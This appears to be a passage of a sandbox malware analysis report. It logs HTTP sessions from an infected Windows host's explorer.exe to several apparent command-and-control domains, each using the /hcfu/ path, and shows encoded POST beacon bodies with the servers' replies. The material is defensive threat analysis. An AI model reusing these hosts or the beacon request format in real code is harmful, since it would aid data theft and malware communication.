Oct 24, 2022 11:08:41.530699968 CEST	416	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=4DW0Ix2ISCDXzyRIq6nLWpFg/kOd6MPQeoh+U0+q17Szsp1AtfvcjVsYAYVpuBtjTM9sWhorW0wi6/FtiSniUr4Ev2EWFbeUdNVgc9Noh4aH HTTP/1.1 Host: www.lilustrlousdates.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:41.578249931 CEST	416	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 24 Oct 2022 09:08:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 46 Connection: close Data Raw: 53 69 74 65 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2c 20 70 6c 65 61 73 65 20 76 69 73 69 74 20 6c 61 74 65 72 Data Ascii: Site is under construction, please visit later

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.7	49729	193.141.64.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:46.866925955 CEST	417	OUT	POST /hcfu/ HTTP/1.1 Host: www.montazeran.net Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.montazeran.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.montazeran.net/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 4a 43 75 6e 37 2d 38 46 6f 62 38 65 28 59 48 5f 70 73 78 42 50 79 4d 75 35 47 4f 33 46 6c 4b 42 45 6b 4c 74 4b 4b 30 73 7a 43 62 71 42 43 51 69 6e 41 38 2d 63 5f 63 74 52 76 59 6f 66 5a 28 37 65 78 34 6f 56 49 79 45 32 77 30 33 33 4b 70 4d 34 6d 50 51 30 66 74 47 42 44 32 52 4f 4a 6d 4f 51 6d 72 4e 66 6b 6e 37 32 34 56 61 65 6d 6d 5a 4f 55 49 77 66 6a 4f 53 44 68 64 6e 6e 58 75 52 4c 63 4d 71 72 55 78 7a 28 4a 4b 45 73 43 44 66 48 36 4b 32 31 78 54 47 45 42 6b 59 69 41 63 36 4f 6f 52 67 63 48 6d 4b 37 52 66 54 38 43 35 70 66 53 71 49 28 52 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=JCun7-8Fob8e(YH_psxBPyMu5GO3FlKBEkLtKK0szCbqBCQinA8-c_ctRvYofZ(7ex4oVIyE2w033KpM4mPQ0ftGBD2ROJmOQmrNfkn724VaemmZOUIwfjOSDhdnnXuRLcMqrUxz(JKEsCDfH6K21xTGEBkYiAc6OoRgcHmK7RfT8C5pfSqI(R0.
Oct 24, 2022 11:08:46.989604950 CEST	418	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Mon, 24 Oct 2022 09:08:46 GMT Connection: close Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2>
Oct 24, 2022 11:08:46.989639997 CEST	419	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.7	49730	193.141.64.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:49.003710032 CEST	419	OUT	GET /hcfu/?u0Gp2vp8=EAGH4IFhh6xE7YX+q6dzLzxowCGyCVWdEG2UGekGzSzRY3UgsSkbc9AFTcp0S8/1Y2oVSaiG2hU25Np27E35wcBaAhf/HofUYUzmWEnkiOgR&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.montazeran.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:49.113472939 CEST	419	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
Oct 24, 2022 11:08:49.113544941 CEST	421	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Mon, 24 Oct 2022 09:08:49 GMT Connection: close Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.7	49731	103.175.163.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:54.727700949 CEST	422	OUT	POST /hcfu/ HTTP/1.1 Host: www.khelojeetopro.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.khelojeetopro.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.khelojeetopro.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 42 50 42 49 6c 50 4b 33 67 64 28 44 63 63 5a 52 5a 39 51 78 67 42 45 76 30 68 57 76 70 72 68 74 7a 54 45 6b 6e 61 4f 58 75 2d 4c 50 71 50 6c 67 48 73 70 46 76 65 4b 62 33 75 72 4b 6f 37 6b 4d 6e 43 28 65 69 51 59 4f 79 73 45 66 63 41 71 36 39 6b 4e 33 4f 33 5a 6a 39 79 39 41 41 5f 74 73 43 53 6a 31 4c 62 31 62 48 4e 6f 5a 51 38 4f 6a 43 43 55 5f 6b 6d 30 61 34 4a 79 75 71 76 6d 77 64 53 71 6e 4b 6f 4d 42 43 74 5a 2d 4e 50 71 32 4c 70 77 70 54 56 36 64 47 69 54 35 78 68 4e 71 78 67 7e 64 42 65 62 6f 37 32 58 46 68 57 69 49 34 48 68 43 46 61 51 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=BPBIlPK3gd(DccZRZ9QxgBEv0hWvprhtzTEknaOXu-LPqPlgHspFveKb3urKo7kMnC(eiQYOysEfcAq69kN3O3Zj9y9AA_tsCSj1Lb1bHNoZQ8OjCCU_km0a4JyuqvmwdSqnKoMBCtZ-NPq2LpwpTV6dGiT5xhNqxg~dBebo72XFhWiI4HhCFaQ.
Oct 24, 2022 11:08:54.929811001 CEST	422	IN	HTTP/1.1 200 OK Date: Mon, 24 Oct 2022 09:08:54 GMT Server: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.3.0 Vary: User-Agent Content-Length: 7 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 68 65 6c 6c 6f 6f 6f Data Ascii: hellooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.7	49732	103.175.163.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:08:56.920855999 CEST	423	OUT	GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=MNpom6rckKTYc/p1bd1msiE7/E65ho0u4Akvh+C3tvGatf13TKlIwaeKtMXL5ZEx/m2/gQUExMh3ECGJi31qDG5C0hkBNbhOEhSrDflhNah3 HTTP/1.1 Host: www.khelojeetopro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:08:57.125719070 CEST	423	IN	HTTP/1.1 200 OK Date: Mon, 24 Oct 2022 09:08:57 GMT Server: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.3.0 Vary: User-Agent Content-Length: 7 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 68 65 6c 6c 6f 6f 6f Data Ascii: hellooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.7	49733	3.13.90.76	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:09:02.446844101 CEST	424	OUT	POST /hcfu/ HTTP/1.1 Host: www.biggaming.xyz Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.biggaming.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.biggaming.xyz/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 4f 65 35 56 6e 54 38 30 6a 4b 74 6a 51 63 4b 30 6f 58 50 67 56 59 35 48 72 36 74 44 53 41 53 46 6f 6e 7e 6f 4e 6c 68 62 79 62 70 75 44 5f 47 4e 59 44 61 7a 7a 66 41 6a 50 7a 28 33 64 51 5a 34 42 49 69 46 4b 48 4c 57 6e 47 54 67 45 6c 74 43 48 4a 53 43 77 5f 50 42 7a 33 48 32 55 79 78 50 6d 73 51 76 48 70 30 79 75 7a 6c 30 6f 5f 6a 57 6e 63 74 39 34 64 6b 43 69 42 64 42 68 41 62 36 54 4a 52 53 58 6f 44 48 56 61 37 51 77 50 7e 65 32 6f 37 36 59 59 7a 6a 35 66 49 62 4e 67 28 70 48 65 36 52 67 63 47 73 78 56 7a 59 4f 4d 6d 44 33 4a 32 59 67 4b 67 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=Oe5VnT80jKtjQcK0oXPgVY5Hr6tDSASFon~oNlhbybpuD_GNYDazzfAjPz(3dQZ4BIiFKHLWnGTgEltCHJSCw_PBz3H2UyxPmsQvHp0yuzl0o_jWnct94dkCiBdBhAb6TJRSXoDHVa7QwP~e2o76YYzj5fIbNg(pHe6RgcGsxVzYOMmD3J2YgKg.
Oct 24, 2022 11:09:02.595745087 CEST	425	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:09:02 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.20.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49707	217.160.0.87	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:06:59.719254971 CEST	357	OUT	POST /hcfu/ HTTP/1.1 Host: www.occludy.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.occludy.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.occludy.com/hcfu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 75 30 47 70 32 76 70 38 3d 36 4d 55 34 71 59 6e 66 66 47 79 4b 33 35 78 4f 54 6e 41 59 48 6c 75 54 64 48 54 4c 43 66 55 35 4b 50 48 45 63 4b 68 76 68 4f 65 75 39 6f 48 31 79 77 6f 50 34 65 7a 76 53 68 34 4f 6c 6b 48 6c 51 62 69 34 4a 30 35 4c 57 39 61 46 58 73 72 6c 68 38 44 58 7a 58 57 61 5a 73 4b 36 59 41 72 4b 76 6b 58 38 56 6a 53 5a 55 68 79 78 62 67 76 69 7a 38 4c 4e 70 2d 44 6d 57 47 45 4c 54 6a 32 70 76 2d 52 6f 6c 62 48 36 57 34 68 30 57 76 52 48 77 35 33 53 35 73 55 37 5a 45 54 6b 77 56 35 6c 71 34 67 57 50 45 72 4f 6f 77 72 64 54 42 4f 62 62 47 4d 42 43 4e 30 2e 00 00 00 00 00 00 00 00 Data Ascii: u0Gp2vp8=6MU4qYnffGyK35xOTnAYHluTdHTLCfU5KPHEcKhvhOeu9oH1ywoP4ezvSh4OlkHlQbi4J05LW9aFXsrlh8DXzXWaZsK6YArKvkX8VjSZUhyxbgviz8LNp-DmWGELTj2pv-RolbH6W4h0WvRHw53S5sU7ZETkwV5lq4gWPErOowrdTBObbGMBCN0.
Oct 24, 2022 11:06:59.749049902 CEST	357	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 24 Oct 2022 09:06:59 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.7	49734	3.13.90.76	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2022 11:09:04.619981050 CEST	425	OUT	GET /hcfu/?u0Gp2vp8=DcR1klBM4JBmZMLd6nvoC7lGrdIYWHbYnViGVkJW/JRBNZmMbg24lMYBXluvYDtmC8yqXkPgj1fAOXZkFouqzsLqhHeORSR6vsolbcc5pjEQ&5jSp=DfjdjluHJP1L6t HTTP/1.1 Host: www.biggaming.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 24, 2022 11:09:04.769951105 CEST	426	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Oct 2022 09:09:04 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not 